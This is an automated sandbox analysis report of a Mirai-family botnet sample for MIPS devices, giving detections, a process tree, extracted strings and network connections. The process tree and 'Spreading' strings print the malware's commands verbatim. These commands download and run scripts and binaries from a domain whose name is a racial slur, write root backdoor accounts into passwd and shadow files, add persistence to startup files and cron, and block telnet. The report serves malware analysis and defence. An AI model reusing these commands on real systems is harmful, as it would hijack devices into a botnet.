Linux Analysis Report
SinYt5YXnO.elf

Overview

General Information

Sample Name: SinYt5YXnO.elf
Original Sample Name: 07d574315f33f2b95716d6c3b48ad229.elf
Analysis ID: 885812
MD5: 07d574315f33f2b95716d6c3b48ad229
SHA1: ddbcb68b45b12b8af7a122b690fcbe543e7be5c3
SHA256: 36cc8f2ee1d904cf90af5c5fa7b7173ad8fa5e2074d82a5e396b71ae1d497f02
Tags: 32 elf mips mirai

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Uses known network protocols on non-standard ports
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Executes the "iptables" command used for managing IP filtering and manipulation
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which no longer works.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version: 37.1.0 Beryl
Analysis ID: 885812
Start date and time: 2023-06-12 10:16:03 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample file name: SinYt5YXnO.elf
Original Sample Name: 07d574315f33f2b95716d6c3b48ad229.elf
Detection: MAL
Classification: mal100.spre.troj.evad.linELF@0/9@2/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: http://%d.%d.%d.%d/bins.sh;
Command: /tmp/SinYt5YXnO.elf
PID: 6222
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Segmentation Fault (memory)
Segmentation Fault (memory)
Standard Error:
  • system is lnxubuntu20
  • SinYt5YXnO.elf (PID: 6222, Parent: 6121, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/SinYt5YXnO.elf
    • SinYt5YXnO.elf New Fork (PID: 6225, Parent: 6222)
      • SinYt5YXnO.elf New Fork (PID: 6229, Parent: 6225)
        • SinYt5YXnO.elf New Fork (PID: 6243, Parent: 6229)
          • sh (PID: 6246, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647\" >> .profile"
          • sh (PID: 6317, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6245, Parent: 6229)
          • sh (PID: 6249, Parent: 6245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd"
          • sh (PID: 6318, Parent: 6245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6248, Parent: 6229)
          • sh (PID: 6253, Parent: 6248, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"echo \\\"ubnt:\\\\\\$1\\\\\\$PN1nGGW/\\\\\\$KgZmi3bN1MBJvypq0J8la/:0:0:Administrator:/etc/persistent:/bin/sh\\\" > /var/etc/passwd && (sleep 120 && /bin/wget http://fucking.blackpeople.lol/mips -O /var/etc/persistent/pr0 && chmod 777 /var/etc/persistent/pr0 && /var/etc/persistent/pr0) &\" > /var/etc/persistent/rc.poststart && echo \"ubnt:\\$1\\$PN1nGGW/\\$KgZmi3bN1MBJvypq0J8la/:0:0:Administrator:/etc/persistent:/bin/sh\" > /var/etc/passwd"
          • sh (PID: 6327, Parent: 6248, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6251, Parent: 6229)
          • sh (PID: 6257, Parent: 6251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cfgmtd -w -p /etc/ && save"
          • sh (PID: 6330, Parent: 6251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6256, Parent: 6229)
          • sh (PID: 6261, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647\" >> /etc/profile"
          • sh (PID: 6329, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6260, Parent: 6229)
          • sh (PID: 6265, Parent: 6260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"#!/bin/sh\\n\\nuseradd -u 0 -g 0 -o -d / ubnt -p '\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0/' >/dev/null 2>&1\" > /etc/cron.hourly/0"
          • sh (PID: 6333, Parent: 6260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6262, Parent: 6229)
          • SinYt5YXnO.elf New Fork (PID: 6280, Parent: 6262)
            • sh (PID: 6290, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /etc/init.d/multipath-tools && chmod +x /etc/init.d/multipath-tools"
              • sh New Fork (PID: 6342, Parent: 6290)
              • chmod (PID: 6342, Parent: 6290, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/multipath-tools
            • sh (PID: 6365, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6266, Parent: 6229)
          • sh (PID: 6272, Parent: 6266, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.d/rc.local && chmod +x /etc/rc.d/rc.local"
          • sh (PID: 6336, Parent: 6266, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6270, Parent: 6229)
          • sh (PID: 6277, Parent: 6270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.d/clith.sh && chmod +x /etc/rc.d/clith.sh"
          • sh (PID: 6338, Parent: 6270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6273, Parent: 6229)
          • sh (PID: 6279, Parent: 6273, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.local && chmod +x /etc/rc.local"
            • sh New Fork (PID: 6334, Parent: 6279)
            • chmod (PID: 6334, Parent: 6279, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/rc.local
          • sh (PID: 6359, Parent: 6273, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6276, Parent: 6229)
          • sh (PID: 6283, Parent: 6276, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /rc.d/rc.local && chmod +x /rc.d/rc.local"
          • sh (PID: 6343, Parent: 6276, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6281, Parent: 6229)
          • sh (PID: 6291, Parent: 6281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /rc.d/cliet.sh && chmod +x /rc.d/cliet.sh "
          • sh (PID: 6340, Parent: 6281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6288, Parent: 6229)
          • sh (PID: 6294, Parent: 6288, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /data/local/tmp; && busybox wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; sh bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /system/etc/init.d/arenahi && chmod +x /system/etc/init.d/arenahi "
          • sh (PID: 6345, Parent: 6288, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6292, Parent: 6229)
          • sh (PID: 6300, Parent: 6292, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/init.d/rcD && chmod +x /etc/init.d/rcD"
            • sh New Fork (PID: 6344, Parent: 6300)
            • chmod (PID: 6344, Parent: 6300, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/rcD
          • sh (PID: 6363, Parent: 6292, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6297, Parent: 6229)
          • sh (PID: 6303, Parent: 6297, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /etc_ro/rcS && chmod +x /etc_ro/rcS"
          • sh (PID: 6348, Parent: 6297, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6302, Parent: 6229)
          • sh (PID: 6308, Parent: 6302, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc_ro/rcD && chmod +x /etc_ro/rcD"
          • sh (PID: 6353, Parent: 6302, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6305, Parent: 6229)
          • sh (PID: 6312, Parent: 6305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /usr/etc/profile"
          • sh (PID: 6351, Parent: 6305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6310, Parent: 6229)
          • sh (PID: 6315, Parent: 6310, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"admin:\\$1\\$I4PkyslC\\$QfxbtwG2TLLBngD2HqOzu0:19391:0:99999:7:0:0:\" > /etc/shadow"
          • sh (PID: 6355, Parent: 6310, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6314, Parent: 6229)
          • sh (PID: 6321, Parent: 6314, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd"
          • sh (PID: 6352, Parent: 6314, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • sh (PID: 6320, Parent: 6229, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --destination-port 23 -j DROP"
          • sh New Fork (PID: 6349, Parent: 6320)
          • iptables (PID: 6349, Parent: 6320, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --destination-port 23 -j DROP
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Source: dump.pcap
Rule: JoeSecurity_Mirai_12
Description: Yara detected Mirai
Author: Joe Security
Strings:

    AV Detection

    Source: SinYt5YXnO.elf Avira: detected
    Source: SinYt5YXnO.elf ReversingLabs: Detection: 36%
    Source: SinYt5YXnO.elf Virustotal: Detection: 40%

    Spreading

    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647" >> .profile
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647" >> /etc/profile
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 && cd /tmp; cd /var/tmp; wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" >> /etc/init.d/%s && chmod +x /etc/init.d/%s
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/rc.d/rc.local && chmod +x /etc/rc.d/rc.local
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/rc.d/clith.sh && chmod +x /etc/rc.d/clith.sh
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/rc.local && chmod +x /etc/rc.local
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /rc.d/rc.local && chmod +x /rc.d/rc.local
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /rc.d/cliet.sh && chmod +x /rc.d/cliet.sh
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /data/local/tmp; && busybox wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; sh bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /system/etc/init.d/arenahi && chmod +x /system/etc/init.d/arenahi
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/init.d/rcD && chmod +x /etc/init.d/rcD
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" >> /etc_ro/rcS && chmod +x /etc_ro/rcS
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc_ro/rcD && chmod +x /etc_ro/rcD
    Source: SinYt5YXnO.elf String: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" >> /usr/etc/profile
    Source: SinYt5YXnO.elf String: cd /tmp; wget http://fucking.blackpeople.lol/bins.sh -O /tmp/bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O /tmp/curlBins.sh; sh /tmp/bins.sh; sh /tmp/curlBins.sh; rm -rf bins.sh
    Source: SinYt5YXnO.elf String: asswordenablesystemshellsh/bin/busybox MIRAIncorrectMIRAI: applet not foundcd /tmp; wget http://fucking.blackpeople.lol/bins.sh -O /tmp/bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O /tmp/curlBins.sh; sh /tmp/bins.sh; sh /tmp/curlBins.sh; rm -rf bins.shcd /tmp; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips; tftp -g -r armv4l fucking.blackpeople.lol; chmod +x armv4l; ./armv4l; tftp -g -r mipsel fucking.blackpeople.lol; chmod +x mipsel; ./mipsel
    Source: .profile.32.dr String: -e (sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647
    Source: rc.local.55.dr String: -e (sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e admin:$1$$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh > /etc/passwd) &
    Source: multipath-tools.68.dr String: -e (sleep 10 && cd /tmp; cd /var/tmp; wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e admin:$1$$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh > /etc/passwd) &
    Source: rcD.73.dr String: -e (sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e admin:$1$$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh > /etc/passwd) &
    Source: profile.45.dr String: -e (sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647

    Networking

    Source: Traffic Snort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin (destination port 5555)
    Source: unknown Network traffic detected: HTTP traffic on port 5555 -> 40572
    Source: unknown Network traffic detected: HTTP traffic on port 5555 -> 53186
    Source: unknown Network traffic detected: HTTP traffic on port 5555 -> 56642
    Source: unknown Network traffic detected: HTTP traffic on port 5555 -> 49508
    Source: unknown Network traffic detected: HTTP traffic on port 5555 -> 40950
    Source: unknown Network traffic detected: HTTP traffic on port 5555 -> 43694
    Source: /bin/sh (PID: 6349) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --destination-port 23 -j DROP
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 159.95.255.246:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 147.95.86.191:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 109.252.166.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 133.13.103.102:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 135.217.236.175:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 58.245.54.243:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 88.152.68.45:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 135.7.239.35:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 164.199.149.212:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 198.44.183.163:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 178.179.181.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 222.173.188.38:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 89.117.188.206:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 158.150.97.138:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 250.172.180.229:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 158.127.223.170:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 174.200.120.65:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 104.223.131.90:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 196.162.80.156:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 149.134.150.88:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 24.58.240.168:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 66.109.127.215:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 253.112.208.235:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 181.240.136.79:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 27.252.151.140:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 209.255.135.122:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 198.119.14.147:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 57.16.235.154:5555
